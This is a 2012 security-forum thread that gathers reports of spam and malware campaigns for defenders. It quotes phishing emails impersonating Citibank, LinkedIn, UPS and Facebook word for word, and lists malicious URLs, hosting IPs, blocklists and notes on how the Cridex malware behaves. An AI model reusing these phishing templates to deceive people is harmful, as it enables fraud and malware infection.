This message is from Citi Cards. Your credit card is issued by Citibank, N.A. If you'd like to refine the types of email messages you receive, or if you'd prefer to stop receiving email from us, please go to... Citibank manages email preferences by line of business. Changing your email preferences with Citi Cards does not change your email preferences for messages from Citibank?s other businesses which include retail branch banking among others.
Should you want to contact us in writing concerning this email, please direct your correspondence to:
Citibank Customer Service
P. O. Box 6500
Sioux Falls, SD 57117
Help / Contact Us
If you have questions about your account, please use our secure message center by signing on at... and choosing "Contact Us" from the "Help / Contact Us" menu. You can also call the customer service phone number on the back of your card.
(c) 2012 Citibank, N.A.
All rights reserved.
Citi, Citibank and Citi with Arc Design are registered service marks of Citigroup Inc.
============================
Date: Thu, 13 Dec 2012 10:30:55 +0200
From: Citi Cards [citicards @info .citibank .com]
Subject: Your Citi Credit Card Statement
Add citicards @info .citibank .com to your address book to ensure delivery.
Your Account: Important Notification
Your Citi Credit Card statement is ready to view online
Dear customer,
Your Citi Credit Card statement is now available for you to view online. Here are some key pieces of information from your statement:
Statement Date: December 13, 2012
Statement Balance: -$5,319.77
Minimum Payment Due: $506.00
Payment Due Date: Tue, January 01, 2013
Want help remembering your payment due date? Sign up for automated alerts such as Payment Due reminders with Alerting Service.
To set up alerts sign on to www .citicards .com and go to Account Profile.
Iprefer not to have this email contain specific information from my statement. Please send me just the announcement that my statement is ready to view online.
View Your Account Pay Your Bill Contact Us
Privacy | Security
Email Preferences
This message is from Citi Cards. Your credit card is issued by Citibank, N.A. If you'd like to refine the types of email messages you receive, or if you'd prefer to stop receiving email from us, please go to... Citibank manages email preferences by line of business. Changing your email preferences with Citi Cards does not change your email preferences for messages from Citibank?s other businesses which include retail branch banking among others.
Should you want to contact us in writing concerning this email, please direct your correspondence to:
Citibank Customer Service
P. O. Box 6500
Sioux Falls, SD 57117
Help / Contact Us
If you have questions about your account, please use our secure message center by signing on at... and choosing "Contact Us" from the "Help / Contact Us" menu. You can also call the customer service phone number on the back of your card.
(c) 2012 Citibank, N.A.
All rights reserved.
Citi, Citibank and Citi with Arc Design are registered service marks of Citigroup Inc.
The links in the email bounce through a legitimate hacked site, and in the samples I have seen end up on [donotclick]6.bbnface .com/string/obscure-logs-useful.php or [donotclick]6.mamaswishes .com/string/obscure-logs-useful.php both hosted on 173.246.102.223 (Gandi, US) which probably contains many other evil sites, so blocking that IP address would probably be prudent."
___
More "Copies of Policies" SPAM / awoeionfpop .ru:
- http://blog.dynamoo.com/2012/12/copies-of-policies-spam-awoeionfpopru.html
13 Dec 2012 - "This spam leads to malware on awoeionfpop .ru:
Date: Thu, 13 Dec 2012 09:08:32 -0400
From: "Myspace" [noreply @message .myspace .com]
Subject: Fwd: Deshaun - Copies of Policies
Unfortunately, I cannot obtain electronic copies of the SPII policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
Deshaun ZAMORA,
The malicious payload is at [donotclick]awoeionfpop .ru:8080/forum/links/column.php hosted on the following IPs that I haven't seen before:
75.148.242.70 (Comcast Business, US)
91.142.208.144 (Axarnet, Spain)..."
(More detail at the dynamoo URL above.)
___
Fake Citibank SPAM / eaglepointecondo .biz
- http://blog.dynamoo.com/2012/12/citibank-spam-eaglepointecondobiz.html
13 Dec 2012 - "This fake Citibank spam leads to malware on eaglepointecondo .biz:
Date: Thu, 13 Dec 2012 16:59:14 +0400
From: "Citi Alerts" [lubumbashiny63 @bankofdeerfield .com]
Subject: Account Operation Alert
EMAIL SAFETY AREA
ATM/Credit card ending in: XXX8
Notifications System
Wire Transaction Issued
Ultimate Savings Account (USA) XXXXXXXXX5
Amount Withdrawn: $4,564.61
Date: 12/12/12
Sign In to Abort Details
Wire Transaction Issued
Ultimate Savings Account (USA) XXXXXXXXX5
Amount Debited: $.24
Date: 12/12/12
Login to Overview Operation
ABOUT THIS MESSAGE
Please DO NOT reply to this message. auto-notification system can't accept incoming mail.
Citibank, N.A. Member FDIC.
2012 Citigroup Inc. Citi with Arc Design and Citibank are registered service marks of Citigroup Inc.
====================
From: Citibank - Alerts [mailto:enormityyf10 @iztzg .hr]
Sent: 13 December 2012 12:50
Subject: Account Operation Alert
Importance: High
EMAIL SAFETY AREA
ATM/Credit card ending in: XXX6
Notifications System
Bill Payment
Checking XXXXXXXXX7
Amount Withdrawn: $5,951.56
Date: 12/12/12
Visit this link to Cancel Detailed information
Bill Payment
Checking XXXXXXXXX7
Amount Debited: $.14
Date: 12/12/12
Login to Review Operation
ABOUT THIS MESSAGE
Please don't reply to this message. auto informer system unable to accept incoming mail.
Citibank, N.A. Member FDIC.
2012 Citigroup Inc. Citi with Arc Design and Citibank are registered service marks of Citigroup Inc.
====================
From: Citibank - Service [mailto:goaliesj79 @wonderware .com]
Sent: 13 December 2012 12:59
Subject: Account Alert
Importance: High
EMAIL SAFETY ZONE
ATM/Debit card ending in: XXX8
Alerting System
Withdraw Message
Savings Account XXXXXXXXX4
Amount Debited: $1,218.42
Date: 12/12/12
Login to Abort Operation
Withdraw Message
Savings Account XXXXXXXXX4
Amount Withdrawn: $.42
Date: 12/12/12
Sign In to Overview Operation
ABOUT THIS MESSAGE
Please DO NOT reply to this message. auto-notification system not configured to accept incoming mail.
Citibank, N.A. Member FDIC.
2012 Citigroup Inc. Citi with Arc Design and Citibank are registered service marks of Citigroup Inc.
The malicious payload is on [donotclick]eaglepointecondo .biz/detects/operation_alert_login.php hosted on 59.57.247.185 in China, the same IP has been used several times for evil recently and you should block it if you can."
:mad:
AplusWebMaster
2012-12-14, 14:51
FYI...
Dexter malware targets POS systems...
- http://www.theregister.co.uk/2012/12/14/dexter_malware_targets_pos_systems/
14 Dec 2012 - "You could be getting more than you bargained for when you swipe your credit card this holiday shopping season, thanks to new malware that can skim credit card info from compromised point-of-sale (POS) systems. First spotted by security firm Seculert*, the malware dubbed "Dexter" is believed to have infected hundreds of POS systems in 40 countries worldwide in recent months. Companies targeted include retailers, hotel chains, restaurants, and private parking providers. The US, the UK, and Canada top the list of countries where the malicious app has been found... Once the malware is installed on a POS system, it grabs the machine's list of active processes and sends them to a command-and-control server – a highly unusual step for POS malware, according to security researchers at Trustwave**..."
* http://blog.seculert.com/2012/12/dexter-draining-blood-out-of-point-of.html
** http://blog.spiderlabs.com/2012/12/the-dexter-malware-getting-your-hands-dirty.html
___
Something evil on 87.229.26.138
- http://blog.dynamoo.com/2012/12/something-evil-on-8722926138.html
14 Dec 2012 - "This seems to be a bunch of evil domains on 87.229.26.138 (Deninet, Hungary) being used in injection attacks. Possible payloads include Blackhole (for example*).
* http://urlquery.net/report.php?id=406222
There are two sets of domains, .in domains being used by themselves and .eu domains being used with subdomains, listed below.
The registration details are probably fake, but for the record the .eu domains are registered to:
Juha Salonen
Lukiokatu 23
13430 Hameenlinna
Hameenlinna
Finland
salonen_juha @yahoo .com
The .in domains are registered to:
Puk T Lapkanen
Puruntie 33
LAPPEENRANTA
53200
FI
+358.443875638
puklapkanen @yahoo .com
If you can block the IP address then it will be the simplest option as there are rather a lot of domains here..."
(More detail at the dynamoo URL above.)
___
Fake Citibank SPAM / 4.whereintrentinoaltoadige .com
- http://blog.dynamoo.com/2012/12/citibank-spam-4whereintrentinoaltoadige.html
14 Dec 2012 - "This fake Citibank spam leads to malware on 4.whereintrentinoaltoadige .com:
Date: Fri, 14 Dec 2012 13:54:14 +0200
From: Citi Cards [citicards @info .citibank .com]
Subject: Your Citi Credit Card Statement
Add citicards @info .citibank .com to your address book to ensure delivery.
Your Account: Important Notification
Your Citi Credit Card statement is ready to view online
Dear customer,
Your Citi Credit Card statement is now available for you to view online. Here are some key pieces of information from your statement:
Statement Date: December 13, 2012
Statement Balance: -$4,550.67
Minimum Payment Due: $764.00
Payment Due Date: Tue, January 01, 2013
Want help remembering your payment due date? Sign up for automated alerts such as Payment Due reminders with Alerting Service.
To set up alerts sign on to... and go to Account Profile.
Iprefer not to have this email contain specific information from my statement. Please send me just the announcement that my statement is ready to view online.
View Your Account Pay Your Bill Contact Us
Privacy | Security
Email Preferences
This message is from Citi Cards. Your credit card is issued by Citibank, N.A. If you'd like to refine the types of email messages you receive, or if you'd prefer to stop receiving email from us, please go to... Citibank manages email preferences by line of business. Changing your email preferences with Citi Cards does not change your email preferences for messages from Citibank?s other businesses which include retail branch banking among others.
Should you want to contact us in writing concerning this email, please direct your correspondence to:
Citibank Customer Service
P. O. Box 6500
Sioux Falls, SD 57117
Help / Contact Us
If you have questions about your account, please use our secure message center by signing on at... and choosing "Contact Us" from the "Help / Contact Us" menu. You can also call the customer service phone number on the back of your card.
(c) 2012 Citibank, N.A.
All rights reserved.
Citi, Citibank and Citi with Arc Design are registered service marks of Citigroup Inc.
====================
Alternative mid-sections:
Statement Date: December 13, 2012
Statement Balance: -$8,902.58
Minimum Payment Due: $211.00
Payment Due Date: Tue, January 01, 2013
Statement Date: December 13, 2012
Statement Balance: -$9,905.95
Minimum Payment Due: $535.00
Payment Due Date: Tue, January 01, 2013
The malicious payload is at [donotclick]4.whereintrentinoaltoadige .com/string/obscure-logs-useful.php hosted on 198.74.54.28 (Linode, US)... malicious domains are also on the same server..."
(More detail at the dynamoo URL above.)
___
More Citibank SPAM / 6.bbnsmsgateway .com
- http://blog.dynamoo.com/2012/12/citibank-spam-6bbnsmsgatewaycom.html
14 Dec 2012 - "This fake Citibank spam leads to malware on 6.bbnsmsgateway .com:
Date: Fri, 14 Dec 2012 19:27:56 +0530
From: Citi Cards [citicards @info.citibank .com]
Subject: Your Citi Credit Card Statement
Add citicards @info.citibank .com to your address book to ensure delivery.
Your Account: Important Notification
Your Citi Credit Card statement is ready to view online
Dear customer,
Your Citi Credit Card statement is now available for you to view online. Here are some key pieces of information from your statement:
Statement Date: December 13, 2012
Statement Balance: -$4,873.54
Minimum Payment Due: $578.00
Payment Due Date: Tue, January 01, 2013
Want help remembering your payment due date? Sign up for automated alerts such as Payment Due reminders with Alerting Service.
To set up alerts sign on to www.citicards.com and go to Account Profile.
Iprefer not to have this email contain specific information from my statement. Please send me just the announcement that my statement is ready to view online.
View Your Account Pay Your Bill Contact Us
Privacy | Security
Email Preferences
This message is from Citi Cards. Your credit card is issued by Citibank, N.A. If you'd like to refine the types of email messages you receive, or if you'd prefer to stop receiving email from us, please go to: http://www.email.citicards.com. Citibank manages email preferences by line of business. Changing your email preferences with Citi Cards does not change your email preferences for messages from Citibank?s other businesses which include retail branch banking among others.
Should you want to contact us in writing concerning this email, please direct your correspondence to:
Citibank Customer Service
P. O. Box 6500
Sioux Falls, SD 57117
Help / Contact Us
If you have questions about your account, please use our secure message center by signing on at... and choosing "Contact Us" from the "Help / Contact Us" menu. You can also call the customer service phone number on the back of your card.
(c) 2012 Citibank, N.A.
All rights reserved.
Citi, Citibank and Citi with Arc Design are registered service marks of Citigroup Inc.
The malicious payload is at [donotclick]6.bbnsmsgateway .com/string/obscure-logs-useful.php hosted on 192.155.81.9 (Linode, US). There are probably some other bad domains on this server, so blocking access to that IP could be prudent."
___
Changelog SPAM / aviaonlolsio .ru
- http://blog.dynamoo.com/2012/12/changelog-spam-aviaonlolsioru.html
14 Dec 2012 - "This fake Changelog spam leads to malware on aviaonlolsio .ru:
From: messages-noreply @bounce .linkedin .com [mailto :messages-noreply @bounce .linkedin .com] On Behalf Of Earlean Gardner via LinkedIn
Sent: 13 December 2012 20:22
Subject: Re: Changelog as promised (upd.)
Hi,
as promised - View
I. SWEET
====================
Date: Fri, 14 Dec 2012 05:22:54 +0700
From: "Kaiya HIGGINS" [fwGpEzHIGGINS @hotmail .com]
Subject: Re: Fwd: Changelog as promised(updated)
Hi,
as promised chnglog updated - View
I. HIGGINS
The malicious payload is at [donotclick]aviaonlolsio .ru:8080/forum/links/column.php hosted on the same IPs as used in this attack:
75.148.242.70 (Comcast Business, US)
91.142.208.144 (Axarnet, Spain)..."
___
Fake Chase emails lead to malware
- http://blog.webroot.com/2012/12/14/fake-chase-merchant-billing-statement-themed-emails-lead-to-malware/
Dec 14, 2012 - "Cybercriminals are currently mass mailing tens of thousands of emails, impersonating Chase in an attempt to trick its customers into executing the malicious attachment found in the fake email. Upon execution, the sample downloads additional malware on the affected hosts, and opens a backdoor allowing the cybercriminals behind the campaign complete access to the host...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/12/chase_merchant_billing_statement_fake_email_spam_malware_social_engineering.png?w=1024
... the cybercriminal/cybercriminals behind it applied low QA (Quality Assurance) since the actual filename found in the malicious archive exceeds 260 characters, resulting in a failed extraction process on Windows hosts.
“C:\Users\Workstation\Desktop\Statement_random_number.pdf.zip: Cannot create Statement_ID_random_number.pdf.exe
Total path and file name length must not exceed 260 characters. The system cannot find the path specified.“
Sample detection rate for the spamvertised attachment: MD5: 676c1a01739b855425f9492126b34d23 * ... Trojan-PSW.Win32.Tepfer.cbrv.
Makes DNS request to 3.soundfactor .org, then it establishes a TCP connection with 184.184.247.60 :14511, as well as UDP connections to the following IPs:
184.184.247.60 :23089
99.124.198.193 :13197
78.93.215.24 :14225
68.167.50.61 :28650 ..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/file/543a1ca2cd76d4a25fce74e356ad770fb28b4833657a6c5e789097482302af37/analysis/1355442736/
File name: Statement_ID.pdf.exe
Detection ratio: 42/46
Analysis date: 2012-12-13
:mad:
AplusWebMaster
2012-12-17, 16:50
FYI...
Pharma SPAM - pillscarehealthcare .com
- http://blog.dynamoo.com/2012/12/pillscarehealthcarecom-spam.html
17 Dec 2012 - "There has been a massive amount of pharma spam pointing to pillscarehealthcare .com over the past 48 hours or so. Here are some examples:
Date: Mon, 17 Dec 2012 02:47:56 +0000 (GMT)
From: "Account Info Change" [tyjinc @palmerlakearttour .com]
To: [redacted]
Subject: Updated information
Updated information
Hello,
The following information for your ID [redacted] was updated on 12/17/2012: Date of birth, Security question and answer.
If these changes were made in error, or if you believe an unauthorized person accessed your account, please reset your account password.
This is an automated message. Please do not reply to this email. If you need additional help, visit our Support Center.
Thanks,
Customer Support
==================
Date: Mon, 17 Dec 2012 01:22:56 -0700
From: "Angela Snider" [directsales @tyroo .com]
To: [redacted]
Subject: Pending ticket status
Ticketing System
Hello,
You have been successfully registered in our Ticketing System
Please, login and check status of your ticket, or close the ticket here
Go To Profile
See All tickets
This message was sent to [redacted]. Should you have any questions, or if you believe that you have received this in error please contact us at support center.
==================
Date: Sat, 15 Dec 2012 21:37:47 -0700
From: "Alexis Houston" [cmassuda @agf .com .br]
To: [redacted]
Subject: Pending ticket notification
Ticketing System
Hello,
You have been successfully registered in our Ticketing System
Please, login and check status of your ticket, or report new ticket here
Go To Profile
See All tickets
This message was sent to [redacted]. Should you have any questions, or if you believe that you have received this in error please contact us at support center.
==================
Date: Sat, 15 Dec 2012 07:06:30 -0800
From: "Account Sender Mail" [daresco @excite .com]
To: [redacted]
Subject: Account is now available
Login unavailable due to maintenance ([redacted])
Hello,
Your Account is now available.
Our systems were unavailable due to maintenance and upgrading system. We apologizes for any inconvenience and appreciates the patience while this critical maintenance was performed. If you still face the problem then it would be better if you contact our team.
Access Your Account
Hope this information helps you.
Thanks,
Support team
==================
From: Kennedi Marquez [mailto:cwtroutn @naturalskincarereviews .info]
Sent: 17 December 2012 11:18
Subject: Updated information
Updated information
Hello,
The following information for your ID [redacted] was updated on 12/17/2012: Date of birth, Security question and answer.
If these changes were made in error, or if you believe an unauthorized person accessed your account, please reset your account password.
This is an automated message. Please do not reply to this email. If you need additional help, visit our Support Center.
Thanks,
Customer Support
This appears to be punting fake drugs rather than malware. pillscarehealthcare .com is hosted on 95.58.254.74 (Kazakh Telecom, Kazakhstan). In my opinion blocking 95.58.254.0/24 will probably do you no harm. These other fake pharma web sites can be found on the same IP address..."
(More detail at the dynamoo URL above.)
:mad:
AplusWebMaster
2012-12-18, 14:14
FYI...
Fake UPS/USPS SPAM / apensiona .ru
- http://blog.dynamoo.com/2012/12/ups-or-is-it-usps-spam-apensionaru.html
18 Dec 2012 - "Spammers often get UPS and the USPS mixed up. They're not the same thing at all. And this one throws FilesTube into the mix as well. Anyway, this fake UPS/USPS/ FilesTube spam leads to malware on apensiona .ru:
From: FilesTube [mailto: filestube @filestube .com]
Sent: 17 December 2012 06:01
Subject: Your Tracking Number H7300014839
USPS Customer Services for big savings!
Can't see images? CLICK HERE.
UPS - UPS TEAM 60 >>
Already Have an Account?
Enjoy all UPS has to offer by linking your My UPS profile to your account.
Link Your Account Now >>
UPS - UPS .com Customer Services
Good Evening, [redacted].
DEAR USER , Recipient's address is wrong
Track your Shipment now!
With Respect To You , Your UPS .com Customer Services.
Shipping | Tracking | Calculate Time & Cost | Open an Account
@ 2011 United Parcel Service of America, Inc. Your USPS .us Customer Services, the UPS brandmark, and the color brown are
trademarks of United Parcel Service of America, Inc. All rights reserved.
This is a marketing e-mail for UPS services. Click here to update your e-mail preferences or to unsubscribe to
USPS Team marketing e-mail. For information on UPS's privacy practices, please refer to UPS Privacy Policy.
Your USPS .us Customer Services, 8 Glenlake Parkway, NE - Atlanta, GA 30585
Attn: Customer Communications Department
The malicious payload is at [donotclick]apensiona .ru:8080/forum/links/column.php which is hosted on 217.112.40.69 (Utransit, claims to be from the UK but probably Russia). The following malicious domains are also on that IP address..."
(More detail at the dynamoo URL above.)
___
GFI Labs Email Roundup for the Week
- http://www.gfi.com/blog/gfi-labs-email-roundup-for-the-week-6/
Dec 18, 2012 - "... noteworthy email threats for the week... covering the dates of December 10 to 14...
“Mailbox Upgrade” Email is a Phish...
> http://gfisoftware.tumblr.com/post/37643320589/e-mail-credentials-phish
... Malicious URLs: my3q .com/survey/458/webgrade2052/77717.phtml
Unsolicited “Adobe CS4 License” Leads to Malware...
> http://gfisoftware.tumblr.com/post/37791588782/adobe-indesign-cs4-license-spam-returns
... Malicious URLs: safeshopper .org.nz/redirecting.htm, happy-school .edu.pl/redirecting.htm, amnaosogo .ru:8080/forum/links/column.php...
Spammers Target Citibank Clients.
> http://gfisoftware.tumblr.com/post/37830503278/malicious-citibank-credit-card-statement-spam
... Malicious URLs... (See the gfisoftware.tumblr URL above.)
___
LinkedIn SPAM / apensiona .ru
- http://blog.dynamoo.com/2012/12/linkedin-spam-apensionaru.html
18 Dec 2012 - "This fake LinkedIn spam leads to malware on apensiona .ru:
From: messages-noreply @bounce .linkedin .com on behalf of LinkedIn Connections
Sent: Tue 18/12/2012 14:01
Subject: Join my network on LinkedIn
LinkedIn
Hien Lawson has indicated you are a Friend
I'd like to add you to my professional network on LinkedIn.
- Hien Lawson
Accept
View invitation from Hien Lawson
WHY MIGHT CONNECTING WITH Hien Lawson BE A GOOD IDEA?
Hien Lawson's connections could be useful to you
After accepting Hien Lawson's invitation, check Hien Lawson's connections to see who else you may know and who you might want an introduction to. Building these connections can create opportunities in the future.
2012, LinkedIn Corporation
The malicious payload is at [donotclick]apensiona .ru:8080/forum/links/column.php (the same payload as here*) although this time the IPs have changed to:
109.235.71.144 (Serveriai, Lithunia)
176.31.111.198 (OVH, France)
217.112.40.69 (Utransit , UK)
Here's a plain list if you want to block the lot:
109.235.71.144
176.31.111.198
217.112.40.69 ..."
* http://blog.dynamoo.com/2012/12/ups-or-is-it-usps-spam-apensionaru.html
:mad:
AplusWebMaster
2012-12-19, 16:17
FYI...
Fake AV - Malware sites to block 19/12/12
- http://blog.dynamoo.com/2012/12/malware-sites-to-block-191212.html
19 Dec 2012 - "This group of sites appears to be using a fake AV applications to download a malicious file scandsk.exe (report here*) via 79.133.196.103 (eTop, Poland) and 82.103.140.100 (Easyspeedy, Denmark) which then attempts to call home to 46.105.131.126 (OVH, Ireland).
* https://www.virustotal.com/file/5c6e3351c4018ecbcd82f9026c2f8c37895e88cc0e7e87398b307b4e98d4bc70/analysis/
Detection ratio: 14/45
This is a screenshot of the fake AV in action:
> https://lh3.ggpht.com/-D3JYfW2LwH8/UNGNBXwma4I/AAAAAAAAA1I/tyIDs4EZIcc/s1600/fakeav.png
From this point, the scandsk.exe gets download either through an exploit or social engineering. This executable looks like some sort of downloader, which attempt to pull down additional data from these non-responding domains:
report.q7ws17sk1ywsk79g .com
report.7ws17sku7myws931u .com
report.u79i1qgmywskuo9o .com
There's some sort of trickery here, perhaps it requires exactly the right kind of factors to hit a valid URL, the automated analysis tools are inconsistent... but seem to indicate a C&C on 46.105.131.126. This IP belongs to OVH (no surprises there) but seems to have been suballocated:
inetnum: 46.105.131.120 - 46.105.131.127
netname: marysanders1
descr: marysanders1net
country: IE
org: ORG-OH5-RIPE
admin-c: OTC9-RIPE
tech-c: OTC9-RIPE
status: ASSIGNED PA
mnt-by: OVH-MNT
source: RIPE # Filtered
I suspect that this whole block is being used for malicious purposes, 46.105.131.123 hosts a site called find-and-go .com registered in China which has been fingered as an attack site before.... I would recommend blocking the entire 46.105.131.120/29 to be on the safe side. The infection sites are on 82.103.140.100 and 79.133.196.103, they make extensive use of subdomains of mooo .com, ez .lv and zyns .com. There are probably legitimate sites making use of these domains, but blocking them completely should give you few headaches. 79.133.196.103 is part of small block of IPs, 79.133.196.96/27, that I have seen malware on before, specifically 79.133.196.105 and 79.133.196.124. Blocking the entire /27 is probably a good idea.
Recommended blocklist:
46.105.131.120/29
82.103.140.100
79.133.196.97/27
mooo .com
ez .lv
zyns .com
Alternatively, these are some of the subdomains in use.. there are a lot of them, and probably more than I have listed here..."
(More detail at the dynamoo URL above.)
___
Fake Facebook SPAM / 46.249.58.211 and 84.200.77.218
- http://blog.dynamoo.com/2012/12/facebook-spam-4624958211-and-8420077218.html
19 Dec 2012 - "There are various Facebook spams doing the rounds pointing to a variety of malware sites on 46.249.58.211 and 84.200.77.218, for example:
From: FB.Team
Sent: 19 December 2012 14:30
Subject: Re-activate account
Hi [redacted],
Your account has been blocked due to spam activity.
To verify account, please follow this link:
http ://www.facebook .com/confirmemail.php?e=[redacted]
You may be asked to enter this confirmation code: [redacted]
The Facebook Team
Didn't sign up for Facebook? Please let us know.
46.249.58.211 (Serverius Holding, Netherlands)...
84.200.77.218 (Misterhost, Germany)...
GFI has some more details on this one here*."
* http://gfisoftware.tumblr.com/post/38303266759/your-facebook-account-is-blocked-due-to-spam-activity
Your Facebook Account is Blocked due to Spam Activity
Dec 19, 2012
___
Fake ‘Change Facebook Color Theme’ events lead to rogue Chrome extensions
- http://blog.webroot.com/2012/12/19/fake-change-facebook-color-theme-events-lead-to-rogue-chrome-extensions/
Dec 19, 2012 - "Cybercriminals have recently launched a privacy-violating campaign spreading across Facebook in an attempt to trick Facebook’s users into installing a rogue Chrome extension. Once installed, it will have access to all the data on all web sites, as well as access to your tabs and browsing history...
Sample screenshot of one of the few currently active Facebook Events promoting the rogue Chrome extension:
> https://webrootblog.files.wordpress.com/2012/12/fake_change_facebook_color_theme_02_rogue_google_chrome_extension.png?w=702
The campaign is relying on automatically registered Tumblr accounts, where the actual redirection takes place. Users are exposed to the following page, enticing them into changing their Facebook color theme:
> https://webrootblog.files.wordpress.com/2012/12/fake_change_facebook_color_theme_01_rogue_google_chrome_extension.png?w=477&h=289
Once users accept the EULA and Privacy Policy, they will become victims of the privacy-violating Chrome extension:
> https://webrootblog.files.wordpress.com/2012/12/fake_change_facebook_color_theme_05_rogue_google_chrome_extension.png?w=555&h=355
... the cybercriminals behind the campaign not only hosted it on Amazon’s cloud, they also featured it in Chrome’s Web Store:
> https://webrootblog.files.wordpress.com/2012/12/fake_change_facebook_color_theme_03_rogue_google_chrome_extension.png?w=614&h=324
In case users choose -not- to accept the EULA and the Privacy Policy, the cybercriminals behind the campaign will once again attempt to monetize the hijacked Facebook traffic by asking them to participate in surveys, part of CPA (Cost-Per-Action) affiliate network, earning -them- money:
> https://webrootblog.files.wordpress.com/2012/12/fake_change_facebook_color_theme_04_rogue_google_chrome_extension.png?w=554&h=310
... Users are advised to be extra cautious when accepting EULAs and Privacy Policies, in particular when installing browser extensions that have the capacity to access sensitive and personally identifiable data on their PCs..."
___
Google Docs SPAM/PHISH...
- https://isc.sans.edu/diary.html?storyid=14731
Last Updated: 2012-12-19 - "... Scams where the attacker's data-collection form resides at a Google Docs (now Google Drive) are especially difficult to warn users about. After all, the malicious webpage resides at the -trusted- google .com domain. The effect is especially severe for organizations using Google Apps as a collaboration platform... such scams aren't going away any time soon..."
> F-secure: http://www.f-secure.com/weblog/archives/00002168.html
> GFI: http://www.gfi.com/blog/google-docs-phishing/
> Sophos: http://nakedsecurity.sophos.com/2012/05/30/phishing-with-help-from-google-docs/
... Recipients who clicked the "CLICK HERE" link were directed to the following "IT HELPDESK SERVICE" page, which prompted for logon credentials that the attacker wanted to capture...
> https://isc.sans.edu/diaryimages/images/it-helpdesk-service-3.png
... The attacker was likely using a -compromised- Google Apps account of another organization to create a Google Docs spreadsheet and expose its data entry form... Avoid clicking on email links when you need to take important actions that require logging in. Relying on a previously-saved bookmark is safer..."
___
LinkedIn Spam: The Repeat
- http://www.gfi.com/blog/linkedin-spam-the-repeat/
Dec 19, 2012 - "Another slew of spam claiming to originate from LinkedIn has hit the wild Internet in less than 24 hours, according* to the real time recording and tracking of email threats by our researchers in the AV Labs.
* http://gfisoftware.tumblr.com/post/38238165249/malicious-linkedin-invitation-spam-returns
... Here’s what the email looks like:
> http://www.gfi.com/blog/wp-content/uploads/2012/12/LinkedIn_1218-wm.png
From: {bogus email address}
To: {random}
Subject: Join my network on LinkedIn
Message body:
{redacted} has indicated you are a Friend
I’d like to add you to my professional network on LinkedIn.
[Allow button] View invitation from {redacted}
WHY MIGHT CONNECTING WITH {redacted} BE A GOOD IDEA?
{redacted} connections could be useful to you
After accepting {redacted} invitation, check {redacted} connections to see who else you may know and who you might want an introduction to. Building these connections can create opportunities in the future.
Clicking the Allow button or the link on the message body directs users to several Web pages of compromised sites, which all look like this:
> http://www.gfi.com/blog/wp-content/uploads/2012/12/linkedin-01-wm-300x105.png
This page laced with the Blackhole Exploit Kit code then auto-redirects users to a Russian website where the Cridex info-stealer payload can be downloaded.
> http://www.gfi.com/blog/wp-content/uploads/2012/12/linkedin-02-wm-300x131.png
when in doubt, users should simply visit their LinkedIn pages and check their profile mailbox for invites..."
___
Wire Transfer SPAM / angelaonfl .ru
- http://blog.dynamoo.com/2012/12/wire-transfer-spam-angelaonflru.html
19 Dec 2012 - "This fake Wire Transfer spam leads to malware on angelaonfl .ru:
Date: Wed, 19 Dec 2012 11:26:24 -0500
From: "Myspace" [noreply @message .myspace .com]
Subject: Wire Transfer (3014YZ20)
Welcome,
Your Wire Transfer Amount: USD 45,429.29
Transfer Report: View
EULALIA Henry,
The Federal Reserve Wire Network
The malicious payload is at [donotclick]angelaonfl .ru:8080/forum/links/column.php hosted on the following IPs:
91.224.135.20 (Proservis UAB, Lithunia)
210.71.250.131 (Chunghwa Telecom, Taiwan)
217.112.40.69 (Utransit, UK)
The following domains and IPs are all related and should be blocked if you can:
91.224.135.20
210.71.250.131
217.112.40.69 ..."
(More detail at the dynamoo URL above.)
___
Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Home > Security Intelligence Operations > Latest Threat Information > Threat Outbreak Alerts
Fake Order Request E-mail Messages - December 19, 2012
Fake Party Invitation E-mail Messages - December 19, 2012
Fake Sample Product Quote E-mail Messages - December 19, 2012
Fake Scanned Image E-mail Messages - December 19, 2012
Fake Unspecified E-mail Messages - December 18, 2012
Fake Payment Invoice E-mail Messages - December 18, 2012
Fake Funds Transfer Notification E-mail Message - December 18, 2012
Fake Airline Ticket Order Notification E-mail Messages - December 18, 2012
Fake Product Order Quotation Attachment E-mail Message - December 18, 2012
Fake Tax Invoice E-mail Messages - December 18, 2012
Fake Order Invoice Notification E-mail Messages - December 18, 2012
Fake Sales Request E-mail Messages - December 18, 2012 ...
:mad: :fear:
AplusWebMaster
2012-12-20, 20:25
FYI...
Fake ‘Citi Account Alert’ emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2012/12/20/fake-citi-account-alert-themed-emails-lead-to-black-hole-exploit-kit/
Dec 20, 2012 - "Cybercriminals are currently mass mailing hundreds of thousands of emails impersonating Citi, using -two- different professionally looking email templates. Upon clicking on any of the links found in the malicious emails, users are exposed to the client-side exploits served by the latest version of the BlackHole Exploit Kit...
Sample screenshot of the first spamvertised template:
> https://webrootblog.files.wordpress.com/2012/12/citi_email_spam_exploits_malware_social_engineering_black_hole_exploit_kit.png
Sample screenshot of the second spamvertised template:
> https://webrootblog.files.wordpress.com/2012/12/citi_email_spam_exploits_malware_social_engineering_black_hole_exploit_kit_01.png
Sample client-side exploits serving URLs:
hxxp ://eaglepointecondo .biz/detects/operation_alert_login.php – 59.57.247.185
Name Server: NS1.AMISHSHOPPE.NET – 209.140.18.37 – Email: solaradvent @yahoo .com
Name Server: NS2.AMISHSHOPPE.NET – 211.27.42.138 – Email: solaradvent @yahoo .com
hxxp ://platinumbristol .net/detects/alert-service.php – 59.57.247.185
Name Server: NS1.AMISHSHOPPE.NET – 209.140.18.37 – Email: solaradvent @yahoo .com
Name Server: NS2.AMISHSHOPPE.NET – 211.27.42.138 – Email: solaradvent @yahoo .com
Upon successful client-side exploitation, the campaign drops MD5: b360fec7652688dc9215fd366530d40c * ... Worm:Win32/Cridex.E.
Once executed, the sample performs the following activities:
Accesses Firefox’s Password Manager local database
Creates a thread in a remote process
Installs a program to run automatically at logon
It creates the following Registry Keys:
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CFBDC89D4
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\S25BC2D7B
With the following value:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
KB00121600.exe = “”%AppData%\KB00121600.exe”"
It then creates the following Mutexes:
Local\XMM000003F8
Local\XMI000003F8
Local\XMRFB119394
Local\XMM000005E4
Local\XMI000005E4
Local\XMM0000009C
Local\XMI0000009C
Local\XMM000000C8
Local\XMI000000C8
